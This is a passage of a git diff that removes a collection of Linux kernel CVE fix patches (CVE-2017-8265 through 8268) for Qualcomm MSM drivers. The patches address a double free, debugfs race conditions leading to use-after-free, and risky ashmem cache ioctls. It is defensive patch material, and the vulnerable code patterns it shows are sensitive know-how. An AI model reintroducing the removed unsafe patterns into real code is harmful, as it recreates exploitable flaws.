- 			<&clock_mmss clk_camss_ispif_ahb_clk>,
- 			<&clock_mmss clk_csi1phytimer_clk_src>,
- 			<&clock_mmss clk_camss_csi1phytimer_clk>,
- 			<&clock_mmss clk_camss_ahb_clk>,
- 			<&clock_mmss clk_csiphy1_3p_clk_src>,
- 			<&clock_mmss clk_camss_csiphy1_3p_clk>;
--		clock-names = "camss_top_ahb_clk",
-+		clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- 			"ispif_ahb_clk", "csiphy_timer_src_clk",
- 			"csiphy_timer_clk", "camss_ahb_clk",
- 			"csiphy_3p_clk_src", "csi_phy_3p_clk";
--		qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+		qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- 	};
- 
- 	qcom,csiphy@a36000 {
-@@ -70,18 +82,24 @@
- 		reg-names = "csiphy", "csiphy_clk_mux";
- 		interrupts = <0 80 0>;
- 		interrupt-names = "csiphy";
--		clocks = <&clock_mmss clk_camss_top_ahb_clk>,
-+		qcom,csi-vdd-voltage = <1250000>;
-+		qcom,mipi-csi-vdd-supply = <&pm8994_l2>;
-+		mmagic-supply = <&gdsc_mmagic_camss>;
-+		gdscr-supply = <&gdsc_camss_top>;
-+		qcom,cam-vreg-name = "mmagic", "gdscr";
-+		clocks = <&clock_mmss clk_mmss_mmagic_ahb_clk>,
-+			<&clock_mmss clk_camss_top_ahb_clk>,
- 			<&clock_mmss clk_camss_ispif_ahb_clk>,
- 			<&clock_mmss clk_csi2phytimer_clk_src>,
- 			<&clock_mmss clk_camss_csi2phytimer_clk>,
- 			<&clock_mmss clk_camss_ahb_clk>,
- 			<&clock_mmss clk_csiphy2_3p_clk_src>,
- 			<&clock_mmss clk_camss_csiphy2_3p_clk>;
--		clock-names = "camss_top_ahb_clk",
-+		clock-names = "mmagic_ahb_clk", "camss_top_ahb_clk",
- 			"ispif_ahb_clk", "csiphy_timer_src_clk",
- 			"csiphy_timer_clk", "camss_ahb_clk",
- 			"csiphy_3p_clk_src", "csi_phy_3p_clk";
--		qcom,clock-rates = <0 0 200000000 0 0 100000000 0>;
-+		qcom,clock-rates = <0 0 0 200000000 0 0 100000000 0>;
- 	};
- 
- 	qcom,csid@a30000  {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 9d6952ee..d1bb9af 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -782,6 +782,25 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 
- 	CDBG("%s:%d called\n", __func__, __LINE__);
- 
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 1);
-+	if (rc < 0) {
-+		pr_err("%s:%d csiphy config_vreg failed\n",
-+			__func__, __LINE__);
-+		goto csiphy_vreg_config_fail;
-+	}
-+	rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 1);
-+	if (rc < 0) {
-+		pr_err("%s:%d csiphy enable_vreg failed\n",
-+			__func__, __LINE__);
-+		goto top_vreg_enable_failed;
-+	}
-+
- 	rc = msm_camera_clk_enable(&csiphy_dev->pdev->dev,
- 		csiphy_dev->csiphy_clk_info, csiphy_dev->csiphy_clk,
- 		csiphy_dev->num_clk, true);
-@@ -790,7 +809,7 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 	if (rc < 0) {
- 		pr_err("%s: csiphy clk enable failed\n", __func__);
- 		csiphy_dev->ref_count--;
--		goto csiphy_resource_fail;
-+		goto csiphy_enable_clk_fail;
- 	}
- 	CDBG("%s:%d called\n", __func__, __LINE__);
- 
-@@ -818,7 +837,17 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- 	return 0;
- 
--csiphy_resource_fail:
-+csiphy_enable_clk_fail:
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 0);
-+top_vreg_enable_failed:
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 0);
-+csiphy_vreg_config_fail:
- 	if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
- 		CAM_AHB_SUSPEND_VOTE) < 0)
- 		pr_err("%s: failed to vote for AHB\n", __func__);
-@@ -856,6 +885,24 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 		pr_err("%s: failed to vote for AHB\n", __func__);
- 		return rc;
- 	}
-+	rc = msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 1);
-+	if (rc < 0) {
-+		pr_err("%s:%d csiphy config_vreg failed\n",
-+			__func__, __LINE__);
-+		goto csiphy_vreg_config_fail;
-+	}
-+	rc = msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 1);
-+	if (rc < 0) {
-+		pr_err("%s:%d csiphy enable_vreg failed\n",
-+			__func__, __LINE__);
-+		goto top_vreg_enable_failed;
-+	}
- 
- 	rc = msm_camera_clk_enable(&csiphy_dev->pdev->dev,
- 		csiphy_dev->csiphy_clk_info, csiphy_dev->csiphy_clk,
-@@ -865,9 +912,9 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 	if (rc < 0) {
- 		pr_err("%s: csiphy clk enable failed\n", __func__);
- 		csiphy_dev->ref_count--;
--		goto csiphy_resource_fail;
-+		goto csiphy_enable_clk_fail;
- 	}
--	CDBG("%s:%d called\n", __func__, __LINE__);
-+	CDBG("%s:%d clk enable success\n", __func__, __LINE__);
- 
- 	if (csiphy_dev->csiphy_3phase == CSI_3PHASE_HW)
- 		msm_csiphy_3ph_reset(csiphy_dev);
-@@ -890,7 +937,17 @@ static int msm_csiphy_init(struct csiphy_device *csiphy_dev)
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_UP;
- 	return 0;
- 
--csiphy_resource_fail:
-+csiphy_enable_clk_fail:
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 0);
-+top_vreg_enable_failed:
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 0);
-+csiphy_vreg_config_fail:
- 	if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
- 		CAM_AHB_SUSPEND_VOTE) < 0)
- 		pr_err("%s: failed to vote for AHB\n", __func__);
-@@ -998,6 +1055,14 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			csiphy_dev->csiphy_3p_clk, 2, false);
- 	}
- 
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg,
-+		csiphy_dev->regulator_count, NULL, 0,
-+		&csiphy_dev->csiphy_reg_ptr[0], 0);
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+		NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
- 
- 	if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
-@@ -1104,6 +1169,13 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 			csiphy_dev->csiphy_3p_clk, 2, false);
- 	}
- 
-+	msm_camera_enable_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+		NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+	msm_camera_config_vreg(&csiphy_dev->pdev->dev,
-+		csiphy_dev->csiphy_vreg, csiphy_dev->regulator_count,
-+		NULL, 0, &csiphy_dev->csiphy_reg_ptr[0], 0);
-+
- 	csiphy_dev->csiphy_state = CSIPHY_POWER_DOWN;
- 
- 	if (cam_config_ahb_clk(NULL, 0, CAM_AHB_CLIENT_CSIPHY,
-@@ -1419,6 +1491,14 @@ static int csiphy_probe(struct platform_device *pdev)
- 		goto csiphy_no_resource;
- 	}
- 
-+	rc = msm_camera_get_dt_vreg_data(pdev->dev.of_node,
-+		&(new_csiphy_dev->csiphy_vreg),
-+		&(new_csiphy_dev->regulator_count));
-+	if (rc < 0) {
-+		pr_err("%s: get vreg data from dtsi fail\n", __func__);
-+		rc = -EFAULT;
-+		goto csiphy_no_resource;
-+	}
- 	/* ToDo: Enable 3phase clock for dynamic clock enable/disable */
- 	rc = msm_csiphy_get_clk_info(new_csiphy_dev, pdev);
- 	if (rc < 0) {
-@@ -1493,7 +1573,7 @@ static int msm_csiphy_exit(struct platform_device *pdev)
- 		&csiphy_dev->csiphy_all_clk,
- 		csiphy_dev->num_all_clk);
- 
--	msm_camera_put_reg_base(pdev, csiphy_dev->base, "csid", true);
-+	msm_camera_put_reg_base(pdev, csiphy_dev->base, "csiphy", true);
- 	if (csiphy_dev->hw_dts_version >= CSIPHY_VERSION_V30) {
- 		msm_camera_put_reg_base(pdev, csiphy_dev->clk_mux_base,
- 			"csiphy_clk_mux", true);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-index 4b3c407..07a0811 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,7 @@
- #include <media/msm_cam_sensor.h>
- #include "msm_sd.h"
- #include "msm_camera_io_util.h"
-+#include "msm_camera_dt_util.h"
- #include "cam_soc_api.h"
- 
- #define MAX_CSIPHY 3
-@@ -168,6 +169,9 @@ struct csiphy_device {
- 	uint8_t num_irq_registers;
- 	uint32_t csiphy_sof_debug;
- 	uint32_t csiphy_sof_debug_count;
-+	struct camera_vreg_t *csiphy_vreg;
-+	struct regulator *csiphy_reg_ptr[MAX_REGULATOR];
-+	int32_t regulator_count;
- };
- 
- #define VIDIOC_MSM_CSIPHY_RELEASE \
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch
deleted file mode 100644
index ac55f011..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8265/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 193813a21453ccc7fb6b04bedf881a6feaaa015f Mon Sep 17 00:00:00 2001
-From: Vasantha Balla <vballa@codeaurora.org>
-Date: Tue, 28 Mar 2017 16:04:06 +0530
-Subject: msm-vidc: Allocate bus vote data during initialization
-
-Dynamic reallocation of vote_data memory can cause double free
-problem if multiple instances try to reallocate simultaneously.
-So allocate this memory statically.
-
-Change-Id: Ib5ff08c600a4b69a38b519688bbc153de9f50090
-Signed-off-by: Vasantha Balla<vballa@codeaurora.org>
----
- drivers/media/platform/msm/vidc/venus_hfi.c | 25 ++++++++++++++-----------
- 1 file changed, 14 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c
-index 4df4f35..8b98c41d 100644
---- a/drivers/media/platform/msm/vidc/venus_hfi.c
-+++ b/drivers/media/platform/msm/vidc/venus_hfi.c
-@@ -929,15 +929,12 @@ static int venus_hfi_vote_active_buses(void *dev,
- 		return -EINVAL;
- 	}
- 
--	/* (Re-)alloc memory to store the new votes (in case we internally
--	 * re-vote after power collapse, which is transparent to client) */
--	cached_vote_data = krealloc(device->bus_load.vote_data, num_data *
--			sizeof(*cached_vote_data), GFP_KERNEL);
--	if (!cached_vote_data) {
--		dprintk(VIDC_ERR, "Can't alloc memory to cache bus votes\n");
--		rc = -ENOMEM;
--		goto err_no_mem;
--	}
-+        cached_vote_data = device->bus_load.vote_data;
-+        if (!cached_vote_data) {
-+                dprintk(VIDC_ERR,"Invalid bus load vote data\n");
-+                rc = -ENOMEM;
-+                goto err_no_mem;
-+        }
- 
- 	/* Alloc & init the load table */
- 	num_bus = device->res->bus_set.count;
-@@ -3746,9 +3743,15 @@ static int venus_hfi_init_bus(struct venus_hfi_device *device)
- 		dprintk(VIDC_DBG, "Registered bus client %s\n", name);
- 	}
- 
--	device->bus_load.vote_data = NULL;
--	device->bus_load.vote_data_count = 0;
-+        device->bus_load.vote_data = (struct vidc_bus_vote_data *)
-+                                        kzalloc(sizeof(struct vidc_bus_vote_data)*MAX_SUPPORTED_INSTANCES_COUNT, GFP_KERNEL);
- 
-+        if (device->bus_load.vote_data == NULL) {
-+                dprintk(VIDC_ERR,"Failed to allocate memory for vote_data\n");
-+                rc = -ENOMEM;
-+                goto err_init_bus;
-+        }
-+        device->bus_load.vote_data_count = 0;
- 	return rc;
- err_init_bus:
- 	venus_hfi_deinit_bus(device);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch
deleted file mode 100644
index c620412f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8266/3.10/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From aa23820b001ab1cfb86b79014e9fc44cd2be9ece Mon Sep 17 00:00:00 2001
-From: Ingrid Gallardo <ingridg@codeaurora.org>
-Date: Wed, 1 Mar 2017 12:24:06 -0800
-Subject: msm: mdss: fix race condition in mdp debugfs
-
-Fix race condition in mdp debugfs properties
-during the read and write of the panel and
-mdp registers. This race condition can cause
-accessing memory out bounderies.
-
-Change-Id: I97a90a154237343d4aaf237c11f525bcc2c3a8e3
-Signed-off-by: Ingrid Gallardo <ingridg@codeaurora.org>
-Signed-off-by: Nirmal Abraham <nabrah@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 48 ++++++++++++++++++++++++++++++-------
- 1 file changed, 40 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index a95fa43..cedd40cd 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -39,6 +39,8 @@
- #define PANEL_CMD_MIN_TX_COUNT 2
- #define PANEL_DATA_NODE_LEN 80
- 
-+static DEFINE_MUTEX(mdss_debug_lock);
-+
- static char panel_reg[2] = {DEFAULT_READ_PANEL_POWER_MODE_REG, 0x00};
- 
- static int panel_debug_base_open(struct inode *inode, struct file *file)
-@@ -88,8 +90,10 @@ static ssize_t panel_debug_base_offset_write(struct file *file,
- 	if (cnt > (dbg->max_offset - off))
- 		cnt = dbg->max_offset - off;
- 
-+	mutex_lock(&mdss_debug_lock);
- 	dbg->off = off;
- 	dbg->cnt = cnt;
-+	mutex_unlock(&mdss_debug_lock);
- 
- 	pr_debug("offset=%x cnt=%d\n", off, cnt);
- 
-@@ -109,15 +113,21 @@ static ssize_t panel_debug_base_offset_read(struct file *file,
- 	if (*ppos)
- 		return 0;	/* the end */
- 
-+	mutex_lock(&mdss_debug_lock);
- 	len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt);
--	if (len < 0 || len >= sizeof(buf))
-+	if (len < 0 || len >= sizeof(buf)) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return 0;
-+	}
- 
--	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return -EFAULT;
-+	}
- 
- 	*ppos += len;	/* increase offset */
- 
-+	mutex_unlock(&mdss_debug_lock);
- 	return len;
- }
- 
-@@ -206,11 +216,16 @@ static ssize_t panel_debug_base_reg_read(struct file *file,
- 	if (!dbg)
- 		return -ENODEV;
- 
--	if (!dbg->cnt)
-+	mutex_lock(&mdss_debug_lock);
-+	if (!dbg->cnt) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return 0;
-+	}
- 
--	if (*ppos)
-+	if (*ppos) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return 0;	/* the end */
-+	}
- 
- 	/* '0x' + 2 digit + blank = 5 bytes for each number */
- 	reg_buf_len = (dbg->cnt * PANEL_REG_FORMAT_LEN)
-@@ -251,11 +266,13 @@ static ssize_t panel_debug_base_reg_read(struct file *file,
- 	kfree(panel_reg_buf);
- 
- 	*ppos += len;	/* increase offset */
-+	mutex_unlock(&mdss_debug_lock);
- 	return len;
- 
- read_reg_fail:
- 	kfree(rx_buf);
- 	kfree(panel_reg_buf);
-+	mutex_unlock(&mdss_debug_lock);
- 	return rc;
- }
- 
-@@ -386,8 +403,10 @@ static ssize_t mdss_debug_base_offset_write(struct file *file,
- 	if (cnt > (dbg->max_offset - off))
- 		cnt = dbg->max_offset - off;
- 
-+	mutex_lock(&mdss_debug_lock);
- 	dbg->off = off;
- 	dbg->cnt = cnt;
-+	mutex_unlock(&mdss_debug_lock);
- 
- 	pr_debug("offset=%x cnt=%x\n", off, cnt);
- 
-@@ -407,15 +426,21 @@ static ssize_t mdss_debug_base_offset_read(struct file *file,
- 	if (*ppos)
- 		return 0;	/* the end */
- 
-+	mutex_lock(&mdss_debug_lock);
- 	len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt);
--	if (len < 0 || len >= sizeof(buf))
-+	if (len < 0 || len >= sizeof(buf)) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return 0;
-+	}
- 
--	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len)) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return -EFAULT;
-+	}
- 
- 	*ppos += len;	/* increase offset */
- 
-+	mutex_unlock(&mdss_debug_lock);
- 	return len;
- }
- 
-@@ -472,6 +497,8 @@ static ssize_t mdss_debug_base_reg_read(struct file *file,
- 		return -ENODEV;
- 	}
- 
-+	mutex_lock(&mdss_debug_lock);
-+
- 	if (!dbg->buf) {
- 		char dump_buf[64];
- 		char *ptr;
-@@ -483,6 +510,7 @@ static ssize_t mdss_debug_base_reg_read(struct file *file,
- 
- 		if (!dbg->buf) {
- 			pr_err("not enough memory to hold reg dump\n");
-+			mutex_unlock(&mdss_debug_lock);
- 			return -ENOMEM;
- 		}
- 
-@@ -513,17 +541,21 @@ static ssize_t mdss_debug_base_reg_read(struct file *file,
- 		dbg->buf_len = tot;
- 	}
- 
--	if (*ppos >= dbg->buf_len)
-+	if (*ppos >= dbg->buf_len) {
-+		mutex_unlock(&mdss_debug_lock);
- 		return 0; /* done reading */
-+	}
- 
- 	len = min(count, dbg->buf_len - (size_t) *ppos);
- 	if (copy_to_user(user_buf, dbg->buf + *ppos, len)) {
- 		pr_err("failed to copy to user\n");
-+		mutex_unlock(&mdss_debug_lock);
- 		return -EFAULT;
- 	}
- 
- 	*ppos += len; /* increase offset */
- 
-+	mutex_unlock(&mdss_debug_lock);
- 	return len;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch
deleted file mode 100644
index 508dd353..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8266/3.18/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 42627c94cf8c189332a6f5bfdd465ea662777911 Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Thu, 13 Apr 2017 15:38:46 -0700
-Subject: msm: mdss: fix race condition during mdp debugfs release
-
-Fix race condition in the release of the mdp debugfs functions
-panel_debug_base_release and mdss_debug_base_release by adding
-the lock for unpreempted freeing of the buffer so that multiple
-concurrent processes cannot affect the release which can possibly
-lead to use-after-free operation on the buffer.
-
-Change-Id: I9586081b65ae2eb0e7f6e30c606ee748ae9ef7e8
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 920babf..78bfe50 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -57,11 +57,13 @@ static int panel_debug_base_open(struct inode *inode, struct file *file)
- static int panel_debug_base_release(struct inode *inode, struct file *file)
- {
- 	struct mdss_debug_base *dbg = file->private_data;
-+	mutex_lock(&mdss_debug_lock);
- 	if (dbg && dbg->buf) {
- 		kfree(dbg->buf);
- 		dbg->buf_len = 0;
- 		dbg->buf = NULL;
- 	}
-+	mutex_unlock(&mdss_debug_lock);
- 	return 0;
- }
- 
-@@ -386,11 +388,13 @@ static int mdss_debug_base_open(struct inode *inode, struct file *file)
- static int mdss_debug_base_release(struct inode *inode, struct file *file)
- {
- 	struct mdss_debug_base *dbg = file->private_data;
-+	mutex_lock(&mdss_debug_lock);
- 	if (dbg && dbg->buf) {
- 		kfree(dbg->buf);
- 		dbg->buf_len = 0;
- 		dbg->buf = NULL;
- 	}
-+	mutex_unlock(&mdss_debug_lock);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch
deleted file mode 100644
index 3f7a27f3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8266/4.4/0003.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 64e4e29356928bea60ae4be5b387eb7d8d7a7f45 Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Thu, 13 Apr 2017 15:38:46 -0700
-Subject: msm: mdss: fix race condition during mdp debugfs release
-
-Fix race condition in the release of the mdp debugfs functions
-panel_debug_base_release and mdss_debug_base_release by adding
-the lock for unpreempted freeing of the buffer so that multiple
-concurrent processes cannot affect the release which can possibly
-lead to use-after-free operation on the buffer.
-
-Change-Id: I9586081b65ae2eb0e7f6e30c606ee748ae9ef7e8
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_debug.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/fbdev/msm/mdss_debug.c b/drivers/video/fbdev/msm/mdss_debug.c
-index e6086914..0ecf1ef 100644
---- a/drivers/video/fbdev/msm/mdss_debug.c
-+++ b/drivers/video/fbdev/msm/mdss_debug.c
-@@ -59,11 +59,13 @@ static int panel_debug_base_open(struct inode *inode, struct file *file)
- static int panel_debug_base_release(struct inode *inode, struct file *file)
- {
- 	struct mdss_debug_base *dbg = file->private_data;
-+	mutex_lock(&mdss_debug_lock);
- 	if (dbg && dbg->buf) {
- 		kfree(dbg->buf);
- 		dbg->buf_len = 0;
- 		dbg->buf = NULL;
- 	}
-+	mutex_unlock(&mdss_debug_lock);
- 	return 0;
- }
- 
-@@ -385,11 +387,13 @@ static int mdss_debug_base_open(struct inode *inode, struct file *file)
- static int mdss_debug_base_release(struct inode *inode, struct file *file)
- {
- 	struct mdss_debug_base *dbg = file->private_data;
-+	mutex_lock(&mdss_debug_lock);
- 	if (dbg && dbg->buf) {
- 		kfree(dbg->buf);
- 		dbg->buf_len = 0;
- 		dbg->buf = NULL;
- 	}
-+	mutex_unlock(&mdss_debug_lock);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch
deleted file mode 100644
index 61f054bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8267/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001
-From: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
-Date: Thu, 6 Apr 2017 16:15:48 -0700
-Subject: ashmem: remove cache maintenance support
-
-The cache maintenance routines in ashmem were causing
-several security issues. Since they are not being used
-anymore by any drivers, its well to remove them entirely.
-
-CRs-Fixed: 1107034, 2001129, 2007786
-Change-Id: I955e33d90b888d58db5cf6bb490905283374425b
-Signed-off-by: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
----
- drivers/staging/android/ashmem.c | 41 ----------------------------------------
- include/uapi/linux/ashmem.h      |  3 ---
- 2 files changed, 44 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index ee79ac8..f13aab2 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -32,7 +32,6 @@
- #include <linux/mutex.h>
- #include <linux/shmem_fs.h>
- #include <linux/ashmem.h>
--#include <asm/cacheflush.h>
- 
- #include "ashmem.h"
- 
-@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd,
- 	return ret;
- }
- 
--static int ashmem_cache_op(struct ashmem_area *asma,
--	void (*cache_func)(const void *vstart, const void *vend))
--{
--	int ret = 0;
--	struct vm_area_struct *vma;
--	if (!asma->vm_start)
--		return -EINVAL;
--
--	down_read(&current->mm->mmap_sem);
--	vma = find_vma(current->mm, asma->vm_start);
--	if (!vma) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if (vma->vm_file != asma->file) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if ((asma->vm_start + asma->size) > vma->vm_end) {
--		ret = -EINVAL;
--		goto done;
--	}
--	cache_func((void *)asma->vm_start,
--			(void *)(asma->vm_start + asma->size));
--done:
--	up_read(&current->mm->mmap_sem);
--	if (ret)
--		asma->vm_start = 0;
--	return ret;
--}
--
- static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- {
- 	struct ashmem_area *asma = file->private_data;
-@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 			ashmem_shrink(&ashmem_shrinker, &sc);
- 		}
- 		break;
--	case ASHMEM_CACHE_FLUSH_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_flush_range);
--		break;
--	case ASHMEM_CACHE_CLEAN_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_clean_range);
--		break;
--	case ASHMEM_CACHE_INV_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_inv_range);
--		break;
- 	}
- 
- 	return ret;
-diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h
-index 7ec977f..7797439 100644
---- a/include/uapi/linux/ashmem.h
-+++ b/include/uapi/linux/ashmem.h
-@@ -34,8 +34,5 @@ struct ashmem_pin {
- #define ASHMEM_UNPIN		_IOW(__ASHMEMIOC, 8, struct ashmem_pin)
- #define ASHMEM_GET_PIN_STATUS	_IO(__ASHMEMIOC, 9)
- #define ASHMEM_PURGE_ALL_CACHES	_IO(__ASHMEMIOC, 10)
--#define ASHMEM_CACHE_FLUSH_RANGE	_IO(__ASHMEMIOC, 11)
--#define ASHMEM_CACHE_CLEAN_RANGE	_IO(__ASHMEMIOC, 12)
--#define ASHMEM_CACHE_INV_RANGE		_IO(__ASHMEMIOC, 13)
- 
- #endif /* _UAPI_LINUX_ASHMEM_H */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch
deleted file mode 100644
index ae5c451f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8268/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 5f3b68da4c8f6474df2497b6d912465d640904b8 Mon Sep 17 00:00:00 2001
